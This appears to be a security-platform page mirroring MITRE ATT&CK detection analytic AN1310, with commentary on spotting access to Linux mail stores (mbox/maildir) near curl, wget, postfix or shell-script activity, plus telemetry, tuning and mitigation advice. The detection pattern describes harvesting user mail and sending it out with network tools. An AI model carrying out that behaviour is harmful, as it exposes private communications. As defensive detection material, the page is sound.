AN1310: Analytic 1310
Detects file access to mbox/maildir files in conjunction with curl/wget/postfix execution, or anomalous shell scripts harvesting user mail directories.
Analyst context for executives and security teams
This analytic matters because it focuses on suspicious access to Linux user mail stores, especially when that access appears near curl, wget, postfix, or shell-script activity. For leaders, the practical issue is not just malware detection; it is whether the organization can prove when local email archives were accessed, by whom or what process, and whether that activity was normal administration or potential collection of sensitive communications.
Executive priority
Prioritize this where Linux systems host or cache user mail, because gaps in file-access and process telemetry can weaken incident scoping, privacy/compliance evidence, and executive confidence during a suspected data-access event. Security leaders should ask whether SOC and IR teams can correlate mail-store access with process execution and script activity on Linux, and whether those events are retained long enough to support investigations.
Technical view
ATT&CK supplies this as a Linux detection analytic with no tactic mapping and no separate detection logic. Defenders should validate correlation coverage for access to mbox/maildir files alongside execution of curl, wget, postfix, and anomalous shell scripts that enumerate or harvest user mail directories. Treat the analytic as a detection hypothesis requiring local tuning: distinguish expected mail service, backup, migration, and administrative activity from unusual user, process, path, timing, or volume patterns.
Likely telemetry
- Linux process execution telemetry for curl, wget, postfix, shells, and script interpreters
- Linux file access telemetry for mbox/maildir paths and user mail directories
- Command-line arguments and parent/child process relationships
- User, UID/GID, host, working directory, and process metadata
- Script creation/execution evidence where available
Detection direction
- Confirm whether Linux endpoints and servers generate file-access events for relevant mbox/maildir locations; many environments log process execution but not file reads at useful fidelity.
- Correlate mail-store file access with nearby curl, wget, postfix, shell, or script execution rather than alerting on any single binary alone.
- Tune expected activity for legitimate mail services, mail migrations, backups, indexing, compliance archiving, and administrator troubleshooting.
- Review parent process, user context, execution path, command line, and timing to separate routine service behavior from anomalous shell-driven collection patterns.
- Because no official detection query is supplied, validate logic in the local environment before using it for high-severity alerting.
Mitigation priorities
- Identify Linux systems that store or process local mbox/maildir content and confirm ownership, business purpose, and logging requirements.
- Apply least-privilege access to user mail directories and restrict unnecessary interactive or script-based access where operationally feasible.
- Ensure approved administrative, backup, and mail-processing workflows are documented so detections can be tuned without suppressing meaningful anomalies.
- Review outbound use of curl and wget on mail-hosting systems and apply appropriate egress and execution controls consistent with business requirements.
- Preserve relevant Linux process, file-access, and script execution logs to support incident response and compliance evidence.
Analyst notes and limits
The supplied object is a detection analytic, not a technique, and has no relationship context. The most useful defensive value comes from turning the short analytic description into a local validation exercise: can the SOC see mail-store file access, correlate it with suspicious process activity, and explain benign exceptions?
Official detection logic, tactics, relationships, and aliases were not provided. This take is limited to the supplied Linux platform, analytic description, and external reference. Local mail architecture, logging configuration, and baseline administrative behavior are required to determine severity and coverage.
Analytic 1310
Detects file access to mbox/maildir files in conjunction with curl/wget/postfix execution, or anomalous shell scripts harvesting user mail directories.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 834e08246993… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1310Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.